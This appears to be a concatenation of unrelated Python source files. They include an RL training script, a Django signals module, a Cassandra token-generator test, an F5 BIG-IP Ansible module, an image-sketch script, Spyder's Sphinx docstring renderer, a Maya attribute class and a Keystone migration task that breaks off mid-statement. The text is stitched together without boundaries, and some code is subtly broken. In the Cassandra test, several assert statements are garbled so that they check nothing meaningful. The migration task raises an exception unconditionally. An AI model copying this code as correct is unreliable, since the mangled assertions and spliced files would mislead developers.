trange(n_epochs): core.learn(n_steps=n_steps, n_steps_per_fit=n_steps_per_fit) dataset = core.evaluate(n_episodes=n_episodes_test, render=False) J = np.mean(compute_J(dataset, mdp.info.gamma)) R = np.mean(compute_J(dataset)) E = agent.policy.entropy() tqdm.write('END OF EPOCH ' + str(it+1)) tqdm.write('J: {}, R: {}, entropy: {}'.format(J, R, E)) tqdm.write('##################################################################################################') print('Press a button to visualize') input() core.evaluate(n_episodes=5, render=True) if __name__ == '__main__': max_kl = .015 policy_params = dict( std_0=1., n_features=32, use_cuda=torch.cuda.is_available() ) ppo_params = dict(actor_optimizer={'class': optim.Adam, 'params': {'lr': 3e-4}}, n_epochs_policy=4, batch_size=64, eps_ppo=.2, lam=.95, quiet=True) trpo_params = dict(ent_coeff=0.0, max_kl=.01, lam=.95, n_epochs_line_search=10, n_epochs_cg=100, cg_damping=1e-2, cg_residual_tol=1e-10, quiet=True) algs_params = [ (TRPO, 'trpo', trpo_params), (PPO, 'ppo', ppo_params) ] for alg, alg_name, alg_params in algs_params: experiment(alg=alg, env_id='Pendulum-v0', horizon=200, gamma=.99, n_epochs=40, n_steps=30000, n_steps_per_fit=3000, n_episodes_test=25, alg_params=alg_params, policy_params=policy_params)
""" Signals for this application. .. py:data:: city_items_pre_import Emited by city_import() in the cities_light command for each row parsed in the data file. If a signal reciever raises InvalidItems then it will be skipped. An example is worth 1000 words: if you want to import only cities from France, USA and Belgium you could do as such:: import cities_light def filter_city_import(sender, items, **kwargs): if items[8] not in ('FR', 'US', 'BE'): raise cities_light.InvalidItems() cities_light.signals.city_items_pre_import.connect(filter_city_import) Note: this signal gets a list rather than a City instance for performance reasons. .. py:data:: region_items_pre_import Same as :py:data:`~cities_light.signals.city_items_pre_import`. .. py:data:: country_items_pre_import Same as :py:data:`~cities_light.signals.region_items_pre_import` and :py:data:`cities_light.signals.city_items_pre_import`. .. py:data:: translation_items_pre_import Same as :py:data:`~cities_light.signals.region_items_pre_import` and :py:data:`cities_light.signals.city_items_pre_import`. Note: Be careful because of long runtime; it will be called VERY often. .. py:data:: city_items_post_import Emited by city_import() in the cities_light command for each row parsed in the data file, right before saving City object. Along with City instance it pass items with geonames data. Will be useful, if you define custom cities models with ``settings.CITIES_LIGHT_APP_NAME``. Example:: import cities_light def process_city_import(sender, instance, items, **kwargs): instance.timezone = items[17] cities_light.signals.city_items_post_import.connect(process_city_import) .. py:data:: region_items_post_import Same as :py:data:`~cities_light.signals.city_items_post_import`. .. py:data:: country_items_post_import Same as :py:data:`~cities_light.signals.region_items_post_import` and :py:data:`cities_light.signals.city_items_post_import`. """ from __future__ import unicode_literals import django.dispatch __all__ = ['city_items_pre_import', 'region_items_pre_import', 'country_items_pre_import', 'city_items_post_import', 'region_items_post_import', 'country_items_post_import', 'translation_items_pre_import'] city_items_pre_import = django.dispatch.Signal(providing_args=['items']) region_items_pre_import = django.dispatch.Signal(providing_args=['items']) country_items_pre_import = django.dispatch.Signal(providing_args=['items']) translation_items_pre_import = django.dispatch.Signal(providing_args=['items']) city_items_post_import = django.dispatch.Signal( providing_args=['instance', 'items']) region_items_post_import = django.dispatch.Signal( providing_args=['instance', 'items']) country_items_post_import = django.dispatch.Signal( providing_args=['instance', 'items'])
import os import subprocess import time import pytest import parse import logging from cassandra.util import sortedset from ccmlib import common from dtest import Tester from tools.data import rows_to_list since = pytest.mark.since logger = logging.getLogger(__name__) @since('2.0.16', max_version='3.0.0') class TestTokenGenerator(Tester): """ Basic tools/bin/token-generator test. Token-generator was removed in CASSANDRA-5261 @jira_ticket CASSANDRA-5261 @jira_ticket CASSANDRA-9300 """ def call_token_generator(self, install_dir, randomPart, nodes): executable = os.path.join(install_dir, 'tools', 'bin', 'token-generator') if common.is_win(): executable += ".bat" args = [executable] if randomPart is not None: if randomPart: args.append("--random") else: args.append("--murmur3") for n in nodes: args.append(str(n)) logger.debug('Invoking {}'.format(args)) token_gen_output = subprocess.check_output(args).decode() lines = token_gen_output.split("\n") dc_tokens = None generated_tokens = [] for line in lines: if line.startswith("DC #"): if dc_tokens is not None: assert dc_tokens.__len__(), 0 > "dc_tokens is empty from token-generator {}".format(args) generated_tokens.append(dc_tokens) dc_tokens = [] else: if line: m = parse.search('Node #{node_num:d}:{:s}{node_token:d}', line) assert m, "Line \"{}\" does not match pattern from token-generator {}".format(line is not None, args) node_num = int(m.named['node_num']) node_token = int(m.named['node_token']) dc_tokens.append(node_token) assert node_num, dc_tokens.__len__() == "invalid token count from token-generator {}".format(args) assert dc_tokens is not None, "No tokens from token-generator {}".format(args) assert dc_tokens.__len__(), 0 > "No tokens from token-generator {}".format(args) generated_tokens.append(dc_tokens) return generated_tokens def prepare(self, randomPart=None, nodes=1): cluster = self.cluster install_dir = cluster.get_install_dir() generated_tokens = self.call_token_generator(install_dir, randomPart, [nodes]) if not randomPart: cluster.set_partitioner("org.apache.cassandra.dht.Murmur3Partitioner") else: if randomPart: cluster.set_partitioner("org.apache.cassandra.dht.RandomPartitioner") else: cluster.set_partitioner("org.apache.cassandra.dht.Murmur3Partitioner") # remove these from cluster options - otherwise node's config would be overridden with cluster._config_options_ cluster._config_options.__delitem__('num_tokens') if self.dtest_config.use_vnodes: cluster._config_options.__delitem__('initial_token') assert not cluster.nodelist(), "nodelist() already initialized" cluster.populate(nodes, use_vnodes=False, tokens=generated_tokens[0]).start(wait_for_binary_proto=True) time.sleep(0.2) node = cluster.nodelist()[0] session = self.patient_cql_connection(node) return generated_tokens, session def _token_gen_test(self, nodes, randomPart=None): generated_tokens, session = self.prepare(randomPart, nodes=nodes) dc_tokens = generated_tokens[0] tokens = [] local_tokens = rows_to_list(session.execute("SELECT tokens FROM system.local"))[0] assert local_tokens.__len__(), 1 == "too many tokens for peer" for tok in local_tokens: tokens += tok rows = rows_to_list(session.execute("SELECT tokens FROM system.peers")) assert rows.__len__() == nodes - 1 for row in rows: peer_tokens = row[0] assert peer_tokens.__len__(), 1 == "too many tokens for peer" for tok in peer_tokens: tokens.append(tok) assert tokens.__len__() == dc_tokens.__len__() for cluster_token in tokens: tok = int(cluster_token) assert dc_tokens.index(tok), 0 >= "token in cluster does not match generated tokens" def token_gen_def_test(self, nodes=3): """ Validate token-generator with Murmur3Partitioner with default token-generator behavior """ self._token_gen_test(nodes) def token_gen_murmur3_test(self, nodes=3): """ Validate token-generator with Murmur3Partitioner with explicit murmur3 """ self._token_gen_test(nodes, False) def token_gen_random_test(self, nodes=3): """ Validate token-generator with Murmur3Partitioner with explicit random """ self._token_gen_test(nodes, True) dc_nodes_combinations = [ [3, 5], [3, 5, 5], [12, 5, 7], [50, 100, 250], [100, 100, 100], [250, 250, 250], [1000, 1000, 1000], [2500, 2500, 2500, 2500] ] def _multi_dc_tokens(self, random=None): t_min = 0 t_max = 1 << 127 if random is None or not random: t_min = -1 << 63 t_max = 1 << 63 for dc_nodes in self.dc_nodes_combinations: all_tokens = sortedset() node_count = 0 generated_tokens = self.call_token_generator(self.cluster.get_install_dir(), random, dc_nodes) assert dc_nodes.__len__() == generated_tokens.__len__() for n in range(0, dc_nodes.__len__()): nodes = dc_nodes[n] node_count += nodes tokens = generated_tokens[n] assert nodes == tokens.__len__() for tok in tokens: assert t_min <= tok < t_max, "Generated token %r out of Murmur3Partitioner range %r..%r" % (tok, t_min, t_max - 1) assert not all_tokens.__contains__(tok), "Duplicate token %r for nodes-counts %r" % (tok, dc_nodes) all_tokens.add(tok) assert all_tokens.__len__() == node_count, "Number of tokens %r and number of nodes %r does not match for %r" % (all_tokens.__len__(), node_count, dc_nodes) def test_multi_dc_tokens_default(self): self._multi_dc_tokens() def test_multi_dc_tokens_murmur3(self): self._multi_dc_tokens(False) def test_multi_dc_tokens_random(self): self._multi_dc_tokens(True)
#!/usr/bin/python # -*- coding: utf-8 -*- # # Copyright: (c) 2018, F5 Networks Inc. # GNU General Public License v3.0 (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt) from __future__ import absolute_import, division, print_function __metaclass__ = type ANSIBLE_METADATA = {'metadata_version': '1.1', 'status': ['preview'], 'supported_by': 'certified'} DOCUMENTATION = r''' --- module: bigip_dns_zone short_description: Manage DNS zones on BIG-IP description: - Manage DNS zones on BIG-IP. The zones managed here are primarily used for configuring DNS Express on BIG-IP. This module does not configure zones that are found in BIG-IP ZoneRunner. version_added: 2.8 options: name: description: - Specifies the name of the DNS zone. - The name must begin with a letter and contain only letters, numbers, and the underscore character. type: str required: True dns_express: description: - DNS express related settings. type: dict suboptions: server: description: - Specifies the back-end authoritative DNS server from which the BIG-IP system receives AXFR zone transfers for the DNS Express zone. type: str enabled: description: - Specifies the current status of the DNS Express zone. type: bool notify_action: description: - Specifies the action the system takes when a NOTIFY message is received for this DNS Express zone. - If a TSIG key is configured for the zone, the signature is only validated for C(consume) and C(repeat) actions. - When C(consume), the NOTIFY message is seen only by DNS Express. - When C(bypass), the NOTIFY message does not go to DNS Express, but instead goes to a back-end DNS server (subject to the value of the Unhandled Query Action configured in the DNS profile applied to the listener that handles the DNS request). - When C(repeat), the NOTIFY message goes to both DNS Express and any back-end DNS server. type: str choices: - consume - bypass - repeat allow_notify_from: description: - Specifies the IP addresses from which the system accepts NOTIFY messages for this DNS Express zone. type: list verify_tsig: description: - Specifies whether the system verifies the identity of the authoritative nameserver that sends updated information for this DNS Express zone. type: bool response_policy: description: - Specifies whether this DNS Express zone is a DNS response policy zone (RPZ). type: bool nameservers: description: - Specifies the DNS nameservers to which the system sends NOTIFY messages. type: list tsig_server_key: description: - Specifies the TSIG key the system uses to authenticate the back-end DNS authoritative server that sends AXFR zone transfers to the BIG-IP system. type: str state: description: - When C(present), ensures that the resource exists. - When C(absent), ensures the resource is removed. type: str choices: - present - absent default: present partition: description: - Device partition to manage resources on. type: str default: Common extends_documentation_fragment: f5 author: - Tim Rupp (@caphrim007) ''' EXAMPLES = r''' - name: Create a DNS zone for DNS express bigip_dns_zone: name: foo.bar.com dns_express: enabled: yes server: dns-lab allow_notify_from: - 192.168.39.10 notify_action: consume verify_tsig: no response_policy: no provider: password: secret server: lb.mydomain.com user: admin delegate_to: localhost ''' RETURN = r''' enabled: description: Whether the zone is enabled or not. returned: changed type: bool sample: yes allow_notify_from: description: The new DNS Express Allow NOTIFY From value. returned: changed type: list sample: ['1.1.1.1', '2.2.2.2'] notify_action: description: The new DNS Express Notify Action value. returned: changed type: str sample: consume verify_tsig: description: The new DNS Express Verify Notify TSIG value. returned: changed type: bool sample: yes express_server: description: The new DNS Express Server value. returned: changed type: str sample: server1 response_policy: description: The new DNS Express Response Policy value. returned: changed type: bool sample: no nameservers: description: The new Zone Transfer Clients Nameservers value. returned: changed type: list sample: ['/Common/server1', '/Common/server2'] tsig_server_key: description: The new TSIG Server Key value. returned: changed type: str sample: /Common/key1 ''' from ansible.module_utils.basic import AnsibleModule from ansible.module_utils.basic import env_fallback try: from library.module_utils.network.f5.bigip import F5RestClient from library.module_utils.network.f5.common import F5ModuleError from library.module_utils.network.f5.common import AnsibleF5Parameters from library.module_utils.network.f5.common import fq_name from library.module_utils.network.f5.common import f5_argument_spec from library.module_utils.network.f5.common import transform_name from library.module_utils.network.f5.common import flatten_boolean from library.module_utils.network.f5.compare import cmp_simple_list except ImportError: from ansible.module_utils.network.f5.bigip import F5RestClient from ansible.module_utils.network.f5.common import F5ModuleError from ansible.module_utils.network.f5.common import AnsibleF5Parameters from ansible.module_utils.network.f5.common import fq_name from ansible.module_utils.network.f5.common import f5_argument_spec from ansible.module_utils.network.f5.common import transform_name from ansible.module_utils.network.f5.common import flatten_boolean from ansible.module_utils.network.f5.compare import cmp_simple_list class Parameters(AnsibleF5Parameters): api_map = { 'dnsExpressEnabled': 'enabled', 'dnsExpressAllowNotify': 'allow_notify_from', 'dnsExpressNotifyAction': 'notify_action', 'dnsExpressNotifyTsigVerify': 'verify_tsig', 'dnsExpressServer': 'express_server', 'responsePolicy': 'response_policy', 'transferClients': 'nameservers', 'serverTsigKey': 'tsig_server_key', } api_attributes = [ 'dnsExpressEnabled', 'dnsExpressAllowNotify', 'dnsExpressNotifyAction', 'dnsExpressNotifyTsigVerify', 'dnsExpressServer', 'responsePolicy', 'transferClients', 'serverTsigKey', ] returnables = [ 'enabled', 'allow_notify_from', 'notify_action', 'verify_tsig', 'express_server', 'response_policy', 'nameservers', 'tsig_server_key', ] updatables = [ 'enabled', 'allow_notify_from', 'notify_action', 'verify_tsig', 'express_server', 'response_policy', 'nameservers', 'tsig_server_key', ] class ApiParameters(Parameters): pass class ModuleParameters(Parameters): @property def express_server(self): try: if self._values['dns_express']['server'] is None: return None if self._values['dns_express']['server'] in ['', 'none']: return '' return fq_name(self.partition, self._values['dns_express']['server']) except (TypeError, KeyError): return None @property def nameservers(self): if self._values['nameservers'] is None: return None elif len(self._values['nameservers']) == 1 and self._values['nameservers'][0] in ['', 'none']: return '' return [fq_name(self.partition, x) for x in self._values['nameservers']] @property def tsig_server_key(self): if self._values['tsig_server_key'] is None: return None if self._values['tsig_server_key'] in ['', 'none']: return '' return fq_name(self.partition, self._values['tsig_server_key']) @property def enabled(self): try: return flatten_boolean(self._values['dns_express']['enabled']) except (TypeError, KeyError): return None @property def verify_tsig(self): try: return flatten_boolean(self._values['dns_express']['verify_tsig']) except (TypeError, KeyError): return None @property def notify_action(self): try: return self._values['dns_express']['notify_action'] except (TypeError, KeyError): return None @property def response_policy(self): try: return flatten_boolean(self._values['dns_express']['response_policy']) except (TypeError, KeyError): return None @property def allow_notify_from(self): try: v = self._values['dns_express']['allow_notify_from'] if v is None: return None elif len(v) == 1 and v[0] in ['', 'none']: return '' return v except (TypeError, KeyError): return None class Changes(Parameters): def to_return(self): result = {} try: for returnable in self.returnables: result[returnable] = getattr(self, returnable) result = self._filter_params(result) except Exception: pass return result class UsableChanges(Changes): pass class ReportableChanges(Changes): pass class Difference(object): def __init__(self, want, have=None): self.want = want self.have = have def compare(self, param): try: result = getattr(self, param) return result except AttributeError: return self.__default(param) @property def allow_notify_from(self): return cmp_simple_list(self.want.allow_notify_from, self.have.allow_notify_from) @property def nameservers(self): return cmp_simple_list(self.want.nameservers, self.have.nameservers) @property def express_server(self): if self.want.express_server is None: return None if self.want.express_server == '' and self.have.express_server is None: return None if self.want.express_server != self.have.express_server: return self.want.express_server @property def tsig_server_key(self): if self.want.tsig_server_key is None: return None if self.want.tsig_server_key == '' and self.have.tsig_server_key is None: return None if self.want.tsig_server_key != self.have.tsig_server_key: return self.want.tsig_server_key def __default(self, param): attr1 = getattr(self.want, param) try: attr2 = getattr(self.have, param) if attr1 != attr2: return attr1 except AttributeError: return attr1 class ModuleManager(object): def __init__(self, *args, **kwargs): self.module = kwargs.get('module', None) self.client = F5RestClient(**self.module.params) self.want = ModuleParameters(params=self.module.params) self.have = ApiParameters() self.changes = UsableChanges() def _set_changed_options(self): changed = {} for key in Parameters.returnables: if getattr(self.want, key) is not None: changed[key] = getattr(self.want, key) if changed: self.changes = UsableChanges(params=changed) def _update_changed_options(self): diff = Difference(self.want, self.have) updatables = Parameters.updatables changed = dict() for k in updatables: change = diff.compare(k) if change is None: continue else: if isinstance(change, dict): changed.update(change) else: changed[k] = change if changed: self.changes = UsableChanges(params=changed) return True return False def should_update(self): result = self._update_changed_options() if result: return True return False def exec_module(self): changed = False result = dict() state = self.want.state if state == "present": changed = self.present() elif state == "absent": changed = self.absent() reportable = ReportableChanges(params=self.changes.to_return()) changes = reportable.to_return() result.update(**changes) result.update(dict(changed=changed)) self._announce_deprecations(result) return result def _announce_deprecations(self, result): warnings = result.pop('__warnings', []) for warning in warnings: self.client.module.deprecate( msg=warning['msg'], version=warning['version'] ) def present(self): if self.exists(): return self.update() else: return self.create() def exists(self): uri = "https://{0}:{1}/mgmt/tm/ltm/dns/zone/{2}".format( self.client.provider['server'], self.client.provider['server_port'], transform_name(self.want.partition, self.want.name) ) resp = self.client.api.get(uri) try: response = resp.json() except ValueError: return False if resp.status == 404 or 'code' in response and response['code'] == 404: return False return True def update(self): self.have = self.read_current_from_device() if not self.should_update(): return False if self.module.check_mode: return True self.update_on_device() return True def remove(self): if self.module.check_mode: return True self.remove_from_device() if self.exists(): raise F5ModuleError("Failed to delete the resource.") return True def create(self): self._set_changed_options() if self.module.check_mode: return True self.create_on_device() return True def create_on_device(self): params = self.changes.api_params() params['name'] = self.want.name params['partition'] = self.want.partition uri = "https://{0}:{1}/mgmt/tm/ltm/dns/zone/".format( self.client.provider['server'], self.client.provider['server_port'] ) resp = self.client.api.post(uri, json=params) try: response = resp.json() except ValueError as ex: raise F5ModuleError(str(ex)) if 'code' in response and response['code'] in [400, 403]: if 'message' in response: raise F5ModuleError(response['message']) else: raise F5ModuleError(resp.content) def update_on_device(self): params = self.changes.api_params() uri = "https://{0}:{1}/mgmt/tm/ltm/dns/zone/{2}".format( self.client.provider['server'], self.client.provider['server_port'], transform_name(self.want.partition, self.want.name) ) resp = self.client.api.patch(uri, json=params) try: response = resp.json() except ValueError as ex: raise F5ModuleError(str(ex)) if 'code' in response and response['code'] == 400: if 'message' in response: raise F5ModuleError(response['message']) else: raise F5ModuleError(resp.content) def absent(self): if self.exists(): return self.remove() return False def remove_from_device(self): uri = "https://{0}:{1}/mgmt/tm/ltm/dns/zone/{2}".format( self.client.provider['server'], self.client.provider['server_port'], transform_name(self.want.partition, self.want.name) ) response = self.client.api.delete(uri) if response.status == 200: return True raise F5ModuleError(response.content) def read_current_from_device(self): uri = "https://{0}:{1}/mgmt/tm/ltm/dns/zone/{2}".format( self.client.provider['server'], self.client.provider['server_port'], transform_name(self.want.partition, self.want.name) ) resp = self.client.api.get(uri) try: response = resp.json() except ValueError as ex: raise F5ModuleError(str(ex)) if 'code' in response and response['code'] == 400: if 'message' in response: raise F5ModuleError(response['message']) else: raise F5ModuleError(resp.content) return ApiParameters(params=response) class ArgumentSpec(object): def __init__(self): self.supports_check_mode = True argument_spec = dict( name=dict(required=True), dns_express=dict( type='dict', options=dict( server=dict(), enabled=dict(type='bool'), notify_action=dict( choices=['consume', 'bypass', 'repeat'] ), allow_notify_from=dict(type='list'), verify_tsig=dict(type='bool'), response_policy=dict(type='bool') ) ), nameservers=dict(type='list'), tsig_server_key=dict(), partition=dict( default='Common', fallback=(env_fallback, ['F5_PARTITION']) ), state=dict( default='present', choices=['present', 'absent'] ) ) self.argument_spec = {} self.argument_spec.update(f5_argument_spec) self.argument_spec.update(argument_spec) def main(): spec = ArgumentSpec() module = AnsibleModule( argument_spec=spec.argument_spec, supports_check_mode=spec.supports_check_mode, ) try: mm = ModuleManager(module=module) results = mm.exec_module() module.exit_json(**results) except F5ModuleError as ex: module.fail_json(msg=str(ex)) if __name__ == '__main__': main()
import cv2 import os import numpy as np from util.helper import * from keras.models import load_model mod = load_model('data/mod.h5') def img_to_sketch_with_hed(raw_path, new_img_size, new_path): img = cv2.imread(raw_path) img = img.transpose((2, 0, 1)) light_map = np.zeros(img.shape, dtype=np.float) for channel in range(3): light_map[channel] = get_light_map_single(img[channel]) # light_map = normalize_pic(light_map) light_map = light_map[None] light_map = light_map.transpose((1, 2, 3, 0)) line_mat = mod.predict(light_map, batch_size=1) line_mat = line_mat.transpose((3, 1, 2, 0))[0] line_mat = np.amax(line_mat, 2) adjust_and_save_img(line_mat, new_img_size, path=new_path) return def img_to_sketch_with_hed_with_loop(data_path): img_list = os.listdir(data_path) img_count = 0 time_start = time.time() for img_file in img_list[:100]: file_path = '{}/{}'.format(data_path, img_file) try: img = cv2.imread(file_path) # resize img img = cv2.resize(img, (512, 512), interpolation=cv2.INTER_AREA) except: print('problematic file:', file_path) continue if img is None: print('problematic file:', file_path) continue else: img = img.transpose((2, 0, 1)) light_map = np.zeros(img.shape, dtype=np.float) for channel in range(3): light_map[channel] = get_light_map_single(img[channel]) light_map = normalize_pic(light_map) light_map = light_map[None] light_map = light_map.transpose((1, 2, 3, 0)) line_mat = mod.predict(light_map, batch_size=1) line_mat = line_mat.transpose((3, 1, 2, 0))[0] line_mat = np.amax(line_mat, 2) old_file_location = 'full' new_file_location = 'hed' new_path = file_path.replace(old_file_location, new_file_location) path = new_path, new_path print('newpath', new_path) adjust_and_save_img(line_mat, 512, path) img_count += 1 if img_count % 1000 == 0: time_end = time.time() print('{} images processed! time cost{}'.format(img_count, time_end - time_start)) time_start = time_end print('finished processing {} images !'.format(img_count)) return def high_pass_filter(img): img_gray = cv2.cvtColor(img.astype(np.uint8), cv2.COLOR_BGR2GRAY) kernel_size = 3 img_blurred = cv2.GaussianBlur(img_gray, (kernel_size, kernel_size), 0) max_intensity_value = 255 img_stroke = (img_gray.astype(int) - img_blurred.astype(int))*2 + max_intensity_value return img_stroke def canny_edge_detector(img, img_to_blur, img_to_grayscale, blur_size, lower_threshold, upper_threshold): if img_to_blur: img = cv2.GaussianBlur(img, (blur_size, blur_size), 0) if img_to_grayscale: img = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY) sketch = cv2.Canny(img, lower_threshold, upper_threshold) sketch = cv2.bitwise_not(sketch) return sketch def loop_canny_edge_detector(data_path): img_list = os.listdir(data_path) img_count = 0 for img_file in img_list: file_path = '{}/{}'.format(data_path, img_file) try: img = cv2.imread(file_path) except: print('problematic file:', file_path) continue if img is None: print('problematic file:', file_path) continue else: sketch = canny_edge_detector(img, 1, 1, 3, 50, 250) cv2.imwrite(file_path, sketch) img_count += 1 if img_count % 100 == 0: print('{} images processed!'.format(img_count), end='\r') print('finished processing {} images !'.format(img_count))
# -*- coding: utf-8 -* """ Process docstrings with Sphinx AUTHORS: - Tim Joseph Dumol (2009-09-29): initial version - The Spyder Development Team: Several changes to make it work with Spyder Copyright (C) 2009 Tim Dumol <[email protected]> Copyright (C) 2013 The Spyder Development Team Distributed under the terms of the BSD License Taken from the Sage project (www.sagemath.org). See here for the original version: www.sagemath.org/doc/reference/sagenb/misc/sphinxify.html """ # Stdlib imports import codecs import os import os.path as osp import shutil import sys from tempfile import mkdtemp # 3rd party imports from docutils.utils import SystemMessage as SystemMessage from jinja2 import Environment, FileSystemLoader import sphinx from sphinx.application import Sphinx # Local imports from spyderlib.baseconfig import (_, get_module_data_path, get_module_source_path) from spyderlib.utils import encoding #----------------------------------------------------------------------------- # Globals and constants #----------------------------------------------------------------------------- # Note: we do not use __file__ because it won't be working in the stand-alone # version of Spyder (i.e. the py2exe or cx_Freeze build) CONFDIR_PATH = get_module_source_path('spyderlib.utils.inspector') CSS_PATH = osp.join(CONFDIR_PATH, 'static', 'css') JS_PATH = osp.join(CONFDIR_PATH, 'js') # To let Debian packagers redefine the MathJax and JQuery locations so they can # use their own packages for them. See Issue 1230, comment #7. MATHJAX_PATH = get_module_data_path('spyderlib', relpath=osp.join('utils', 'inspector', JS_PATH, 'mathjax'), attr_name='MATHJAXPATH') JQUERY_PATH = get_module_data_path('spyderlib', relpath=osp.join('utils', 'inspector', JS_PATH), attr_name='JQUERYPATH') #----------------------------------------------------------------------------- # Utility functions #----------------------------------------------------------------------------- def is_sphinx_markup(docstring): """Returns whether a string contains Sphinx-style ReST markup.""" # this could be made much more clever return ("`" in docstring or "::" in docstring) def warning(message): """Print a warning message on the rich text view""" env = Environment() env.loader = FileSystemLoader(osp.join(CONFDIR_PATH, 'templates')) warning = env.get_template("warning.html") return warning.render(css_path=CSS_PATH, text=message) def usage(title, message, tutorial_message, tutorial): """Print a usage message on the rich text view""" env = Environment() env.loader = FileSystemLoader(osp.join(CONFDIR_PATH, 'templates')) usage = env.get_template("usage.html") return usage.render(css_path=CSS_PATH, title=title, intro_message=message, tutorial_message=tutorial_message, tutorial=tutorial) def generate_context(name='', argspec='', note='', math=False, collapse=False, img_path=''): """ Generate the html_context dictionary for our Sphinx conf file. This is a set of variables to be passed to the Jinja template engine and that are used to control how the webpage is rendered in connection with Sphinx Parameters ---------- name : str Object's name. note : str A note describing what type has the function or method being introspected argspec : str Argspec of the the function or method being introspected math : bool Turn on/off Latex rendering on the OI. If False, Latex will be shown in plain text. collapse : bool Collapse sections Returns ------- A dict of strings to be used by Jinja to generate the webpage """ context = \ { # Arg dependent variables 'math_on': 'true' if math else '', 'name': name, 'argspec': argspec, 'note': note, 'collapse': collapse, 'img_path': img_path, # Static variables 'css_path': CSS_PATH, 'js_path': JS_PATH, 'jquery_path': JQUERY_PATH, 'mathjax_path': MATHJAX_PATH, 'right_sphinx_version': '' if sphinx.__version__ < "1.1" else 'true', 'platform': sys.platform } return context def sphinxify(docstring, context, buildername='html'): """ Runs Sphinx on a docstring and outputs the processed documentation. Parameters ---------- docstring : str a ReST-formatted docstring context : dict Variables to be passed to the layout template to control how its rendered (through the Sphinx variable *html_context*). buildername: str It can be either `html` or `text`. Returns ------- An Sphinx-processed string, in either HTML or plain text format, depending on the value of `buildername` """ srcdir = mkdtemp() srcdir = encoding.to_unicode_from_fs(srcdir) base_name = osp.join(srcdir, 'docstring') rst_name = base_name + '.rst' if buildername == 'html': suffix = '.html' else: suffix = '.txt' output_name = base_name + suffix # This is needed so users can type \\ on latex eqnarray envs inside raw # docstrings if context['right_sphinx_version'] and context['math_on']: docstring = docstring.replace('\\\\', '\\\\\\\\') # Add a class to several characters on the argspec. This way we can # highlight them using css, in a similar way to what IPython does. argspec = context['argspec'] for char in ['=', ',', '(', ')', '*', '**']: argspec = argspec.replace(char, '<span class="argspec-highlight">' + char + '</span>') context['argspec'] = argspec doc_file = codecs.open(rst_name, 'w', encoding='utf-8') doc_file.write(docstring) doc_file.close() temp_confdir = False if temp_confdir: # TODO: This may be inefficient. Find a faster way to do it. confdir = mkdtemp() confdir = encoding.to_unicode_from_fs(confdir) generate_configuration(confdir) else: confdir = osp.join(get_module_source_path('spyderlib.utils.inspector')) confoverrides = {'html_context': context} doctreedir = osp.join(srcdir, 'doctrees') sphinx_app = Sphinx(srcdir, confdir, srcdir, doctreedir, buildername, confoverrides, status=None, warning=None, freshenv=True, warningiserror=False, tags=None) try: sphinx_app.build(None, [rst_name]) except SystemMessage: output = _("It was not possible to generate rich text help for this " "object.</br>" "Please see it in plain text.") return warning(output) # TODO: Investigate if this is necessary/important for us if osp.exists(output_name): output = codecs.open(output_name, 'r', encoding='utf-8').read() output = output.replace('<pre>', '<pre class="literal-block">') else: output = _("It was not possible to generate rich text help for this " "object.</br>" "Please see it in plain text.") return warning(output) if temp_confdir: shutil.rmtree(confdir, ignore_errors=True) shutil.rmtree(srcdir, ignore_errors=True) return output def generate_configuration(directory): """ Generates a Sphinx configuration in `directory`. Parameters ---------- directory : str Base directory to use """ # conf.py file for Sphinx conf = osp.join(get_module_source_path('spyderlib.utils.inspector'), 'conf.py') # Docstring layout page (in Jinja): layout = osp.join(osp.join(CONFDIR_PATH, 'templates'), 'layout.html') os.makedirs(osp.join(directory, 'templates')) os.makedirs(osp.join(directory, 'static')) shutil.copy(conf, directory) shutil.copy(layout, osp.join(directory, 'templates')) open(osp.join(directory, '__init__.py'), 'w').write('') open(osp.join(directory, 'static', 'empty'), 'w').write('')
# NumericNodeAttribute.py # (C)2014 # Scott Ernst from __future__ import print_function, absolute_import, unicode_literals, division from elixir.nodes.attrs.NodeAttribute import NodeAttribute try: # noinspection PyUnresolvedReferences,PyUnresolvedReferences from maya import OpenMaya except Exception: maya = None #___________________________________________________________________________________________________ NumericNodeAttribute class NumericNodeAttribute(NodeAttribute): """A class for...""" #=================================================================================================== # C L A S S #___________________________________________________________________________________________________ __init__ def __init__( self, shortFlag, longFlag, defaultValue =0, numericType =OpenMaya.MFnNumericData.kFloat, **kwargs ): """Creates a new instance of NumericNodeAttribute.""" NodeAttribute.__init__( self, shortFlag, longFlag, **kwargs) self._defaultValue = defaultValue self._numericType = numericType #=================================================================================================== # P R O T E C T E D #___________________________________________________________________________________________________ _createAttributeFn def _createAttributeFn(self): return OpenMaya.MFnNumericAttribute() #___________________________________________________________________________________________________ _createAttribute def _createAttribute(self, attrFn): return attrFn.create( self._longFlag, self._shortFlag, self._numericType, self._defaultValue)
# Copyright (C) 2014 Universidad Politecnica de Madrid # # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. """This module holds task used to migrate from old releases. Regular users shouldn't need any of this tasks. """ import datetime import json import os import uuid from deployment.keystone import PopulateTask, _admin_token_connection from conf import settings from keystoneclient import exceptions # This dictinary holds the old ids for permissions and roles. Only used # for migration purposes. MIGRATION_OLD_IDS = { 'Manage the application': '5', 'Manage roles': '6', 'Get and assign all public application roles': '7', 'Manage Authorizations': '8', 'provider': '285', 'purchaser': '6453fc41aa9d404b984d9da0566a1f7e', } CLOUD_APP_ID = 'f8999e1ee0884195997b63280c2b0264' CLOUD_ROLE_ID = 'd38d9cd4fa524b87a87feb45904480f7' NO_FILTER_ENDPOINT_GROUP_ID = '628912b79e5540b8a08d33e5eb60c233' class MigratePopulateTask(PopulateTask): """Populates the database with migration specifics from the old idm.""" name = "populate" def run(self, keystone_path=settings.KEYSTONE_ROOT): keystone = _admin_token_connection() # migration old ids not configured raise Exception() # Keystone services self._create_services_and_endpoints(keystone) # Enpoint groups self._create_endpoint_group_filters(keystone) keystone_roles = self._create_keystone_roles(keystone) idm_user = self._create_idm_user_and_project(keystone, keystone_roles) # user our migration method here to asign ids to roles and permissions idm_app = self._create_internal_roles_and_permissions(keystone) # Make the idm user administrator self._grant_administrator(keystone, idm_app, [idm_user]) def _create_internal_roles_and_permissions(self, keystone): # Default internal application idm_app = keystone.oauth2.consumers.create( settings.IDM_USER_CREDENTIALS['username'], description='', 